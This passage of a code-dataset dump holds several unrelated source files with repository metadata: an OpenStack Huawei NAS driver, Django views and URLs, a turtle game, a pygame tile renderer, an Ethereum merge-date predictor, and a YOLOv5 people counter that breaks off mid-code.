scrape()\n","repo_name":"biglocalnews/warn-scraper","sub_path":"warn/scrapers/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"24676880069","text":"import time\n\nfrom oslo_config import cfg\nfrom oslo_log import log\nfrom oslo_utils import excutils\nfrom oslo_utils import units\n\nfrom manila import exception\nfrom manila.i18n import _\nfrom manila.i18n import _LI\nfrom manila.i18n import _LW\nfrom manila.openstack.common import loopingcall\nfrom manila.share import driver\nfrom manila.share.drivers.huawei import constants\nfrom manila.share.drivers.huawei import huawei_helper\n\nhuawei_opts = [\n cfg.StrOpt('manila_huawei_conf_file',\n default='/etc/manila/manila_huawei_conf.xml',\n help='The configuration file for the Manila Huawei driver.')]\n\nCONF = cfg.CONF\nCONF.register_opts(huawei_opts)\nLOG = log.getLogger(__name__)\n\n\nclass HuaweiNasDriver(driver.ShareDriver):\n \"\"\"Huawei Share Driver.\n\n Executes commands relating to Shares.\n API version history:\n\n 1.0 - Initial version.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Do initialization.\"\"\"\n LOG.debug(\"Enter into init function.\")\n super(HuaweiNasDriver, self).__init__(False, *args, **kwargs)\n self.configuration = kwargs.get('configuration', None)\n if self.configuration:\n self.configuration.append_config_values(huawei_opts)\n self.helper = huawei_helper.RestHelper(self.configuration)\n else:\n raise exception.InvalidShare(_(\"Huawei configuration missing.\"))\n\n def check_for_setup_error(self):\n \"\"\"Returns an error if prerequisites aren't met.\"\"\"\n self.helper._check_conf_file()\n self.helper._check_service()\n\n def do_setup(self, context):\n \"\"\"Any initialization the huawei nas driver does while starting.\"\"\"\n LOG.debug(\"Do setup the plugin.\")\n return self.helper.login()\n\n def create_share(self, context, share, share_server=None):\n \"\"\"Create a share.\"\"\"\n LOG.debug(\"Create a share.\")\n share_name = share['name']\n share_proto = share['share_proto']\n size = share['size'] * units.Mi * 2\n\n fs_id = None\n # We sleep here to ensure the newly created filesystem can be read.\n wait_interval = self._get_wait_interval()\n try:\n fs_id = self.helper.allocate_container(share_name, size)\n\n def _create_share_complete():\n fs = self.helper._get_fs_info_by_id(fs_id)\n if fs['HEALTHSTATUS'] == constants.STATUS_FS_HEALTH\\\n and fs['RUNNINGSTATUS'] == constants.STATUS_FS_RUNNING:\n return True\n else:\n return False\n self._wait_for_condition(_create_share_complete,\n int(wait_interval))\n except Exception:\n with excutils.save_and_reraise_exception():\n if fs_id is not None:\n self.helper._delete_fs(fs_id)\n raise exception.InvalidShare('The status of filesystem error.')\n\n try:\n self.helper._create_share(share_name, fs_id, share_proto)\n except Exception:\n with excutils.save_and_reraise_exception():\n if fs_id is not None:\n self.helper._delete_fs(fs_id)\n\n location = self.helper._get_location_path(share_name, share_proto)\n return location\n\n def create_share_from_snapshot(self, context, share, snapshot,\n share_server=None):\n \"\"\"Is called to create share from snapshot.\"\"\"\n LOG.debug(\"Create share from snapshot.\")\n raise NotImplementedError()\n\n def delete_share(self, context, share, share_server=None):\n \"\"\"Delete a share.\"\"\"\n LOG.debug(\"Delete a share.\")\n\n self.helper._delete_share(share['name'], share['share_proto'])\n\n 
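# Snapshots below are taken against the share's backing filesystem; the snapshot\n    # name is derived from the snapshot id with a \"share_snapshot_\" prefix.\n    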
def create_snapshot(self, context, snapshot, share_server=None):\n \"\"\"Create a snapshot.\"\"\"\n snap_name = snapshot['id']\n share_proto = snapshot['share_proto']\n\n share_name = self.helper._get_share_name_by_id(snapshot['share_id'])\n share_type = self.helper._get_share_type(share_proto)\n share = self.helper._get_share_by_name(share_name, share_type)\n\n if not share:\n err_msg = (_(\"Create a snapshot,share fs id is empty.\"))\n LOG.error(err_msg)\n raise exception.InvalidInput(reason=err_msg)\n\n sharefsid = share['FSID']\n snapshot_name = \"share_snapshot_\" + snap_name\n snap_id = self.helper._create_snapshot(sharefsid,\n snapshot_name)\n LOG.info(_LI('Creating snapshot id %s.'), snap_id)\n\n def delete_snapshot(self, context, snapshot, share_server=None):\n \"\"\"Delete a snapshot.\"\"\"\n LOG.debug(\"Delete a snapshot.\")\n snap_name = snapshot['id']\n\n share_name = self.helper._get_share_name_by_id(snapshot['share_id'])\n sharefsid = self.helper._get_fsid_by_name(share_name)\n\n if sharefsid is None:\n LOG.warn(_LW('Delete snapshot share id %s fs has been deleted.'),\n snap_name)\n return\n\n snapshot_id = self.helper._get_snapshot_id(sharefsid, snap_name)\n snapshot_flag = self.helper._check_snapshot_id_exist(snapshot_id)\n\n if snapshot_flag is True:\n self.helper._delete_snapshot(snapshot_id)\n else:\n LOG.warn(_LW(\"Can not find snapshot %s in array.\"), snap_name)\n\n def ensure_share(self, context, share, share_server=None):\n \"\"\"Ensure that storages are mounted and exported.\"\"\"\n LOG.debug(\"Ensure share.\")\n\n def allow_access(self, context, share, access, share_server=None):\n \"\"\"Allow access to the share.\"\"\"\n LOG.debug(\"Allow access.\")\n\n self.helper._allow_access(share['name'], access, share['share_proto'])\n\n def deny_access(self, context, share, access, share_server=None):\n \"\"\"Deny access to the share.\"\"\"\n LOG.debug(\"Deny access.\")\n\n self.helper._deny_access(share['name'], access, share['share_proto'])\n\n def get_network_allocations_number(self):\n \"\"\"Get number of network interfaces to be created.\"\"\"\n LOG.debug(\"Get network allocations number.\")\n return constants.IP_ALLOCATIONS\n\n def _update_share_stats(self):\n \"\"\"Retrieve status info from share group.\"\"\"\n\n backend_name = self.configuration.safe_get('share_backend_name')\n capacity = self.helper._get_capacity()\n data = dict(\n share_backend_name=backend_name or 'HUAWEI_NAS_Driver',\n vendor_name='Huawei',\n storage_protocol='NFS_CIFS',\n total_capacity_gb=capacity['total_capacity'],\n free_capacity_gb=capacity['free_capacity'])\n super(HuaweiNasDriver, self)._update_share_stats(data)\n\n def _get_wait_interval(self):\n \"\"\"Get wait interval from huawei conf file.\"\"\"\n root = self.helper._read_xml()\n wait_interval = root.findtext('Filesystem/WaitInterval')\n if wait_interval:\n return wait_interval\n else:\n LOG.info(_LI(\n \"Wait interval is not configured in huawei \"\n \"conf file. Use default: %(default_wait_interval)d.\"),\n {\"default_wait_interval\": constants.DEFAULT_WAIT_INTERVAL})\n return constants.DEFAULT_WAIT_INTERVAL\n\n def _get_timeout(self):\n \"\"\"Get timeout from huawei conf file.\"\"\"\n root = self.helper._read_xml()\n timeout = root.findtext('Filesystem/Timeout')\n if timeout:\n return timeout\n else:\n LOG.info(_LI(\n \"Timeout is not configured in huawei conf file. 
\"\n \"Use default: %(default_timeout)d.\"),\n {\"default_timeout\": constants.DEFAULT_TIMEOUT})\n return constants.DEFAULT_TIMEOUT\n\n def _wait_for_condition(self, func, interval, timeout=None):\n start_time = time.time()\n if timeout is None:\n timeout = self._get_timeout()\n\n def _inner():\n try:\n res = func()\n except Exception as ex:\n res = False\n LOG.debug('_wait_for_condition: %(func_name)s '\n 'failed for %(exception)s.',\n {'func_name': func.__name__,\n 'exception': ex.message})\n if res:\n raise loopingcall.LoopingCallDone()\n\n if int(time.time()) - int(start_time) > int(timeout):\n msg = (_('_wait_for_condition: %s timed out.')\n % func.__name__)\n LOG.error(msg)\n raise exception.InvalidShare(data=msg)\n\n timer = loopingcall.FixedIntervalLoopingCall(_inner)\n timer.start(interval=interval).wait()\n","repo_name":"Huawei/OpenStack_Driver","sub_path":"Manila/Kilo-eol/huawei_nas.py","file_name":"huawei_nas.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"35277995056","text":"from django.contrib import admin\nfrom django.urls import path, re_path, include\n\nfrom rest_framework import permissions\n\nfrom apps.users.views import Login, Logout\n\n# noinspection PyUnresolvedReferences\nfrom drf_yasg.views import get_schema_view\n# noinspection PyUnresolvedReferences\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Documentación API MiQuiniela\",\n default_version='v0.1',\n description=\"Documentación pública de API quiniela\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"alvarogarnica1997@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\nurlpatterns = [\n re_path(r'^swagger(?P\\.json|\\.yaml)$', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('admin/', admin.site.urls),\n path('login', Login.as_view(), name='login'),\n path('logout', Logout.as_view(), name='logout'),\n path('api/', include('apps.users.api.urls')),\n path('api/', include('apps.quiniela_main.api.urls')),\n]\n\n","repo_name":"AlvaroGarnicaBarco/django-quiniela","sub_path":"quiniela/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19098912205","text":"from django.db import models\n\n# Create your models here.\nfrom django.db import models\n\n# Create your models here.\nimport numpy as np\nimport pickle\n\n\nimport numpy as np\nimport pandas as pd\n#from sklearn.preprocessing import LabelEncoder\n\n\n\n\nknn = pickle.load(open(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\traffic_knn.pkl', 'rb'))\nrf = pickle.load(open(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\traffic_rf.pkl', 'rb'))\n\ndata = pd.read_csv(r'C:\\Users\\HP\\Downloads\\Project\\Project\\FINAL_CODE\\FRONTEND\\traffic_project\\new_test_data.csv')\nprint(data.head(1))\nprint(data.shape)\n#x = data.drop(['Unnamed: 0'],axis=1)\n\ndef predict(algo,row):\n\t#print(x.columns)\n\ttest_data=data.loc[row].values.reshape(1,-1)\n\tprint(test_data.shape)\n\t#print(test_data.columns)\n\tif algo == 'knn':\n\t\ty_pred = knn.predict(test_data)\n\t\treturn 
y_pred[0]\n\telif algo == 'rf':\n\t\ty_pred = rf.predict(test_data)\n\t\treturn y_pred[0]\n\t","repo_name":"Roheetth/Traffic_Prediction","sub_path":"traffic_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"45141108867","text":"from turtle import Turtle, Screen\nimport random\n\n\nclass Car(Turtle):\n    def __init__(self, number):\n        super().__init__()\n        self.penup()\n        self.shape(\"square\")\n        self.screen = Screen()\n        self.screen.colormode(255)\n        self.shapesize(1.5, 3)\n        self.color(self.set_random_color())\n        self.direction = self.set_random_direction()\n        self.original_pos = self.set_position(number)\n        self.setposition(self.original_pos)\n        self.car_speed = 0\n\n    def set_random_color(self):\n        r = random.randint(0, 255)\n        g = random.randint(0, 255)\n        b = random.randint(0, 255)\n        random_color = (r, g, b)\n        return random_color\n\n    def set_position(self, number):\n        self.x = self.direction\n        self.y = -275 + 40 * (number + 1)\n        return (self.x * 350, self.y)\n\n    def set_random_direction(self):\n        self.dir = random.randrange(-1, 1)\n        if self.dir == 0:\n            self.dir = 1\n        return self.dir\n\n    def update_position(self):\n        self.setposition(self.xcor() - self.dir * self.car_speed, self.ycor())\n\n    def set_random_speed(self, level):\n        self.car_speed = random.randint(3, 10) + level\n\n","repo_name":"Ninjobik/Day_23_Crossy_Roads","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27862203058","text":"#!/usr/bin/env python\nimport time\nimport sys\n\ntry:\n    fp = sys.argv[1]\nexcept:\n    fp = 'book.log'\n\nlast = None\n\nwhile True:\n\n    time.sleep(0.001)\n\n    try:\n        asdf = open(fp).readlines()\n    except: continue\n\n    if asdf != last and len(asdf) > 0 and 'EOF' in asdf[-1]:\n        i = asdf.index('bids\\n')\n\n        print('\\033c' + 'offers\\n' + ''.join(asdf[max(0,i-11):min(len(asdf),i+11)]))\n        last = asdf\n","repo_name":"benzyx/tamit2019","sub_path":"print_book.py","file_name":"print_book.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"26451884640","text":"import datetime\n\nfrom django.contrib.auth.models import User\nfrom .models import Task, Comment, Status\nfrom .forms import AddCommentForm, UpdateTaskForm, FilterForm, AddTaskForm\nfrom rest_framework.viewsets import ModelViewSet\nfrom .serializers import TaskSerializer\nfrom django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter\nfrom rest_framework.permissions import IsAdminUser, IsAuthenticated, AllowAny\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom rest_framework.response import Response\nfrom django.shortcuts import render, redirect\nfrom django.db.models import Q\n\n\ndef check_deadline():\n\t\"\"\"Check each task's due date and assign the task the corresponding status. \"\"\"\n\tdate = datetime.date.today()\n\n\tstatus = Status.objects.get(title='просрочена')\n\ttask_for_update = Task.objects.filter(date_date_to__lt=date).filter(status=Status.objects.get(title='в работе'))\n\tfor task in task_for_update:\n\t\ttask.status = status\n\tTask.objects.bulk_update(task_for_update, ['status'])\n\n\tstatus = Status.objects.get(title='в работе')\n\ttask_for_update = Task.objects.filter(date_date_to__gt=date).filter(status=Status.objects.get(title='просрочена'))\n\tfor task in task_for_update:\n\t\ttask.status = status\n\tTask.objects.bulk_update(task_for_update, ['status'])\n\n\nclass TaskList(ModelViewSet):\n\t\"\"\"Task list viewset; behavior depends on the request method (get, post, put, delete).\"\"\"\n\tserializer_class = TaskSerializer\n\n\tqueryset = Task.objects.all()\n\tpermission_classes_by_action = {'create': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'list': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'retrieve': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'update': [IsAuthenticated],\n\t\t\t\t\t\t\t\t\t'destroy': [IsAdminUser],\n\t\t\t\t\t\t\t\t\t}\n\tfilter_backends = [DjangoFilterBackend]\n\tfilterset_fields = ['responsible', 'status']\n#\tordering_fields = ['title', 'responsible', 'date_from', 'date_date_to', 'status']\n\trenderer_classes = [TemplateHTMLRenderer]\n\ttemplate_name = 'main.html'\n\n\tdef list(self, request, *args, **kwargs):\n\t\tcheck_deadline()\n\t\ttask_filter_form = FilterForm()\n\t\tqueryset = self.filter_queryset(self.get_queryset())\n\t\tserializer = self.get_serializer(queryset, many=True)\n\t\treturn Response({'tasks': serializer.data, 'task_filter_form': task_filter_form}, template_name='main.html')\n\n\tdef get(self, request, *args, **kwargs):\n\t\tcheck_deadline()\n\t\ttask_filter_form = FilterForm()\n\t\tcomment_form = AddCommentForm()\n\t\tinstance = self.get_object()\n\t\tserializer = self.get_serializer(instance)\n\t\tcomments = Comment.objects.filter(task_id=instance.id).select_related('user')\n\t\tresponsibles = User.objects.all().values('id', 'username')\n\t\treturn Response({'task': serializer.data, 'comment_form': comment_form, 'comments':comments,\n\t\t\t\t\t\t 'responsibles': responsibles, 'task_filter_form': task_filter_form}, template_name='task.html')\n\n\tdef create(self, request, *args, **kwargs):\n\t\ttask_form = AddTaskForm(request.POST)\n\t\ttask_filter_form = FilterForm()\n\t\tif task_form.is_valid():\n\t\t\ttitle = task_form.cleaned_data.get('title')\n\t\t\tresponsible = task_form.cleaned_data.get('responsible')\n\t\t\tdate_date_to = task_form.cleaned_data.get('date_date_to')\n\t\t\tstatus = task_form.cleaned_data.get('status')\n\t\t\tTask.objects.create(title=title, responsible=responsible, date_date_to=date_date_to, status=status)\n\t\t# serializer = self.get_serializer(data=request.POST)\n\t\t# serializer.is_valid(raise_exception=True)\n\t\t# self.perform_create(serializer)\n\t\t# headers = self.get_success_headers(serializer.data)\n\t\ttasks = Task.objects.all().select_related('responsible')\n\t\treturn Response({'tasks': tasks, 'task_filter_form': task_filter_form}, template_name='main.html')\n\n\tdef update(self, request, *args, **kwargs):\n\t\ttask_filter_form = FilterForm()\n\t\tpk = kwargs['pk']\n\t\tinstance = self.get_object()\n\t\ttask_form_update = UpdateTaskForm(request.POST)\n\t\ttask = Task.objects.get(id=pk)\n\t\tcomments = Comment.objects.filter(task_id=instance.id).select_related('user')\n\t\tresponsibles = User.objects.all().values('id', 'username')\n\t\tcomment_form = AddCommentForm()\n\t\tif task_form_update.is_valid():\n\t\t\ttask.title = task_form_update.cleaned_data.get('title')\n\t\t\ttask.responsible = task_form_update.cleaned_data.get('responsible')\n\t\t\ttask.date_date_to = task_form_update.cleaned_data.get('date_date_to')\n\t\t\ttask.status = task_form_update.cleaned_data.get('status')\n\t\t\ttask.save()\n\t\t\tComment.objects.create(user=request.user, task=task, 
descr=f'редактирование задачи')\n\t\t\treturn Response({'task': task, 'comment_form': comment_form,\n\t\t\t\t\t\t\t 'comments': comments, 'responsibles': responsibles, 'task_filter_form': task_filter_form},\n\t\t\t\t\t\t\ttemplate_name='task.html')\n\n\tdef get_permissions(self):\n\t\ttry:\n\t\t\t# return permission_classes depending on `action`\n\t\t\treturn [permission() for permission in self.permission_classes_by_action[self.action]]\n\t\texcept KeyError:\n\t\t\t# action is not set return default permission_classes\n\t\t\treturn [permission() for permission in self.permission_classes]\n\n","repo_name":"AVKulikov1982/Tasks","sub_path":"app_tasks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39996451494","text":"import rectop\n\nfrom lib.external import pygame\n\nDEBUGCOLOR = (200,30,200)\n\nCURVE_CONNECTIONS = {\n ('midtop', 'midright'): 'topright',\n ('midright', 'midbottom'): 'bottomright',\n ('midbottom', 'midleft'): 'bottomleft',\n ('midleft', 'midtop'): 'topleft',\n}\n\ndef tile(midpoints_radius, corners_radius, connections):\n \"\"\"\n Render truchet tile.\n :param connections: 2-tuples of midpoint names to connect.\n \"\"\"\n frame_bg_color = (30,) * 3\n tile_bg_color = (60,) * 3\n midpoint_color = (20,) * 3\n\n # NOTES\n # * maybe the little dots should not be \"connectors\" they should be \"terminators\".\n # * transparent \"outside the tile\" so that the overlapping works.\n\n small_diameter = midpoints_radius * 2\n big_diameter = corners_radius * 2\n\n frame_side_length = big_diameter * 2 + small_diameter\n frame_rect = pygame.Rect((0, )*2, (frame_side_length,)*2)\n\n surf = pygame.Surface(frame_rect.size)\n surf.fill(frame_bg_color)\n\n sidelen = big_diameter + small_diameter\n tile_rect = rectop.get.new(\n size = (sidelen, ) * 2,\n center = frame_rect.center,\n )\n\n # fill inner tile area\n pygame.draw.rect(surf, tile_bg_color, tile_rect)\n\n # separate curves and straight connectors so they can be draw in an order.\n curve_radius = tile_rect.width // 2 + midpoints_radius\n dots = []\n connrects = []\n curves = []\n for attrs in connections:\n attr1, attr2 = attrs\n if attr1 is None:\n dots.append(attr2)\n elif attr2 is None:\n dots.append(attr1)\n elif rectop.get.opposite_midpoint(attr1) == attr2:\n # rect\n point1 = getattr(tile_rect, attr1)\n point2 = getattr(tile_rect, attr2)\n # sort top-bottom, left-right\n point1, point2 = sorted([point1, point2], key=lambda p: (p[1], p[0]))\n if (\n # already confirmed a mid point\n ('top' in attr1 or 'bottom' in attr1)\n and\n ('top' in attr2 or 'bottom' in attr2)\n ):\n # top-bottom\n x = tile_rect.centerx - midpoints_radius\n y = tile_rect.top\n width = small_diameter\n height = tile_rect.height\n else:\n # left-right\n x = tile_rect.left\n y = tile_rect.centery - midpoints_radius\n height = small_diameter\n width = tile_rect.width\n connrect = pygame.Rect(x,y,width,height)\n connrects.append((midpoint_color, connrect, 0))\n else:\n # curve\n # find the corner to put a big circle in for the \"curve\"\n for ATTRS, pointattr in CURVE_CONNECTIONS.items():\n if set(ATTRS) == set(attrs):\n break\n else:\n raise ValueError\n corner_point = getattr(tile_rect, pointattr)\n curves.append((midpoint_color, corner_point, curve_radius, 0))\n curves.append((tile_bg_color, corner_point, corners_radius, 0))\n\n # draw \"curves\"\n for color, center, radius, width in curves:\n pygame.draw.circle(surf, color, 
center, radius, width)\n\n # \"clear\" the big curve circles from the outside of the tile\n # NOTE: maybe do this with a separate surface, letting clipping do the work?\n for outside_rect in rectop.cut.with_knife(tile_rect, frame_rect):\n pygame.draw.rect(surf, frame_bg_color, outside_rect, 0)\n\n # draw debugging big circles on corners\n for point in rectop.get.corners(tile_rect):\n pygame.draw.circle(surf, DEBUGCOLOR, point, corners_radius, 1)\n\n # draw straight horizontal and vertical connectors\n for color, rect, width in connrects:\n pygame.draw.rect(surf, color, rect, width)\n\n # draw little \"connector\" circles in midpoints\n for attr in dots:\n point = getattr(tile_rect, attr)\n pygame.draw.circle(surf, midpoint_color, point, midpoints_radius, 0)\n\n # draw the tile frame\n pygame.draw.rect(surf, DEBUGCOLOR, tile_rect, 1)\n\n return surf\n","repo_name":"hitbox/scratch","sub_path":"pygame/shrinkwrap/render/truchet.py","file_name":"truchet.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73389757226","text":"import json\nimport os\nimport time\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nT = 10 ** 12\nP = T * 1000\ndegree = int(os.environ['DEGREE'])\nstep = int(os.environ['STEP'])\ntolerance = counter = int(os.environ['TOLERANCE'])\nblock_interval = int(os.environ['ETH_INTERVAL'])\ninterval = int(os.environ['INTERVAL'])\n\ntime_target = int(os.environ['TIME_TARGET'])\ntime_span = int(os.environ['TIME_SPAN'])\nttd_target = float(os.environ['TTD_TARGET'])\n\nwarnings.filterwarnings('ignore')\n\nspans = {'7d': int(7 * 24 * 3600 / interval), '14d': int(14 * 24 * 3600 / interval),\n '28d': int(28 * 24 * 3600 / interval)}\n\n\ndef moving_average(data, step=30):\n ma_data = []\n for index in range(data.size - step):\n ma_data.append(sum(data[index:index + step]) // step)\n return ma_data\n\n\ndef adjust_length(data, step=30):\n return data[step:]\n\n\ndef poly_predict(t, ttd):\n l = len(t)\n coeff = {}\n coeff['coeff_ttd'] = np.polyfit(t, ttd, degree)\n\n # Errors\n err_h = []\n err_l = []\n err = []\n coeff['poly_value'] = []\n for i in range(l):\n coeff['poly_value'].append(np.polyval(coeff['coeff_ttd'], t[i]))\n diff = abs(coeff['poly_value'][-1] - ttd[i])\n err.append(diff ** 2)\n err_h.append(diff + ttd[i])\n err_l.append(ttd[i] - diff)\n\n coeff['coeff_h'] = np.polyfit(t, err_h, degree)\n coeff['coeff_l'] = np.polyfit(t, err_l, degree)\n\n # Mean squared error\n MSE = np.average(err)\n # print(\"MSE: \", MSE)\n\n # Training split\n train_size = int((l - 1) * 0.75)\n t_train = t[0:train_size]\n ttd_train = ttd[0:train_size]\n\n coeff['coeff_train'] = np.polyfit(t_train, ttd_train, degree)\n\n # Print the equation\n # i = 0\n # while i <= degree:\n # if i == degree:\n # print(\"(%.10f)\" % (coeff['coeff_ttd'][i]))\n # break\n # print(\"(%.10f*x^%d)+\" % (coeff['coeff_ttd'][i], degree - i,), end=\"\")\n # i += 1\n\n return coeff\n\n\ndef choosing_roots(roots):\n for root in roots:\n root = int(root)\n if root < 0:\n continue\n if abs(root - time_target) >= time_span:\n continue\n\n return root\n\n\ndef estimate_ttd(polynom_ttd, ttd, coeff_h, coeff_l):\n # Find x for given y\n result = {}\n substitute = np.copy(polynom_ttd)\n substitute[-1] -= ttd_target\n result['point'] = choosing_roots(np.roots(substitute))\n\n substitute = np.copy(coeff_h)\n substitute[-1] -= ttd_target\n result['point_high'] = 
choosing_roots(np.roots(substitute))\n\n substitute = np.copy(coeff_l)\n substitute[-1] -= ttd_target\n result['point_low'] = choosing_roots(np.roots(substitute))\n\n # Calculated averages from data\n ttd_diff_avg = int(np.average(np.diff(ttd)))\n # time_diff_avg = int(np.average(np.diff(t)))\n return result\n\n\ndef analyze():\n blocks = json.load(fp=open('points.json', 'r'))\n result = {'timestamp_list': [], 'origin_curve': [], 'predict_curves': [],\n 'update_info': {'number': blocks[-1]['number'], 'timestamp': blocks[-1]['timestamp']}}\n for curve_name, span in spans.items():\n data = load_data(span, blocks)\n t_data, ts_str_data, ts_data, hashrate_data, ttd_data = data['UnixTimestamp'], [], [], data['Difficulty'], data[\n 'TTD']\n for index in range(data.index.size):\n t = int(data['UnixTimestamp'][index])\n ts_data.append(t)\n ts_str = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t))\n ts_str_data.append(ts_str)\n\n coeff = poly_predict(t_data, ttd_data)\n roots = estimate_ttd(coeff['coeff_ttd'], ttd_data, coeff['coeff_h'], coeff['coeff_l'])\n for k, v in roots.items():\n print(k, v, time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(v)))\n predict_info = predict_line(poly_params=coeff['coeff_ttd'], ts_data=ts_data)\n\n if len(result['timestamp_list']) <= len(predict_info['ts_str']):\n result['timestamp_list'] = to_list(predict_info['timestamp'])\n if len(result['origin_curve']) <= ttd_data.size:\n result['origin_curve'] = to_list(ttd_data)\n result['predict_curves'].append(\n {'name': 'predict_curve_{}'.format(curve_name), 'data': to_list(predict_info['poly_value']),\n 'root': [str(roots.get('point')), os.environ['TTD_TARGET']]})\n json.dump(result, indent=2, fp=open(\"{}.json\".format('data'), 'w'))\n return result\n\n\ndef load_data(span, blocks):\n data = {\n 'BlockNumber': [],\n 'TTD': [],\n 'Difficulty': [],\n 'UnixTimestamp': []\n }\n\n for block in blocks[-span:]:\n data['BlockNumber'].append(block['number'])\n data['TTD'].append(float(block['totalDifficulty']))\n data['Difficulty'].append(block['difficulty'])\n data['UnixTimestamp'].append(block['timestamp'])\n df = pd.DataFrame(data)\n return df[['BlockNumber', 'TTD', 'Difficulty', 'UnixTimestamp']]\n\n\ndef predict_line(poly_params, ts_data, span=30 * 24 * 60 * 60):\n predict_dict = {'timestamp': [], 'ts_str': [], 'poly_value': []}\n for t in ts_data:\n predict_dict['timestamp'].append(t)\n predict_dict['ts_str'].append(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t)))\n predict_dict['poly_value'].append(np.polyval(poly_params, t))\n start = ts_data[-1] - ts_data[-1] % interval\n for t in range(start, span + start, interval):\n predict_dict['timestamp'].append(t)\n predict_dict['ts_str'].append(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t)))\n predict_dict['poly_value'].append(np.polyval(poly_params, t))\n return predict_dict\n\n\ndef to_list(data):\n lst = []\n for i in range(len(data)):\n lst.append(str(int(data[i])))\n return lst\n\n\nif __name__ == \"__main__\":\n data = analyze()\n","repo_name":"Zachary-Lingle/predict_eth2_merge","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":5838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30094542760","text":"import torch\r\nimport cv2\r\nimport random\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport math\r\nimport time\r\n\r\n# Load the Model\r\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5n', pretrained=True)\r\nmodel.classes=[0]\r\n\r\n\r\ncap = 
cv2.VideoCapture(0)\r\nwidth = int(cap.get(3)); height = int(cap.get(4)); \r\n\r\nframeno=0\r\nnum_people=0\r\nfpsStart = 0\r\nfps = 0\r\n\r\n\r\n\r\n# returns coordinates of box as list\r\ndef box_coords(box):\r\n xmin=int(box[0])\r\n ymin=int(box[1])\r\n xmax=int(box[2])\r\n ymax=int(box[3])\r\n return [xmin, ymin, xmax, ymax]\r\n\r\n# checks if box touches the bottom of frame\r\ndef checkbot_box(coords,height):\r\n ymax=coords[3]\r\n if ymax>height-(height/54):\r\n return 1\r\n else:\r\n return 0\r\n\r\n# returns center coordinates of box\r\ndef box_cent(coords):\r\n cent_x=int((coords[0]+coords[2])/2)\r\n cent_y=int((coords[1]+coords[3])/2)\r\n return [cent_x,cent_y]\r\n\r\n# gets intersecting area of two boxes\r\ndef inters_area(coord1,coord2):\r\n xmin1=coord1[0]\r\n ymin1=coord1[1]\r\n xmax1=coord1[2]\r\n ymax1=coord1[3]\r\n xmin2=coord2[0]\r\n ymin2=coord2[1]\r\n xmax2=coord2[2]\r\n ymax2=coord2[3]\r\n dx=min(xmax1,xmax2)-max(xmin1,xmin2)\r\n dy=min(ymax1,ymax2)-max(ymin1,ymin2)\r\n if (dx>0) and (dy>0):\r\n return dx*dy\r\n else:\r\n return 0\r\n\r\n# returns list of coordinates of boxes in current frame that are new (no corresponding box in previous frame)\r\ndef newbox(coordlist,i_list):\r\n new_list=[]\r\n for k in coordlist:\r\n if k not in [i[0] for i in i_list]:\r\n new_list+=[k]\r\n return new_list\r\n\r\n# returns list of coordinates of boxes in previous frame that have disappeared (no corresponding box in current frame)\r\ndef dispbox(prev_coordlist,i_list):\r\n disp_list=[]\r\n for k in prev_coordlist:\r\n if k not in [i[1] for i in i_list]:\r\n disp_list+=[k]\r\n return disp_list\r\n\r\n# finds which box in previous slide is the one in current frame (highest intersecting area)\r\ndef matchboxes(coordlist,prev_coordlist,width):\r\n i_list=[]\r\n for coord in coordlist:\r\n area=0\r\n add_ilist=[]\r\n for prev_coord in prev_coordlist:\r\n if inters_area(coord,prev_coord)>area and (math.dist(box_cent(coord),box_cent(prev_coord))<(4*width/20)):\r\n area=inters_area(coord,prev_coord)\r\n add_ilist=[[coord, prev_coord]]\r\n if coord not in [i[0] for i in i_list] and prev_coord not in [j[1] for j in i_list]:\r\n i_list+=add_ilist\r\n return i_list\r\n\r\n\r\n# COUNT_PEOPLE_FRAMEOUT(prev_results, results, frame, rect_frame, num_people)\r\ndef 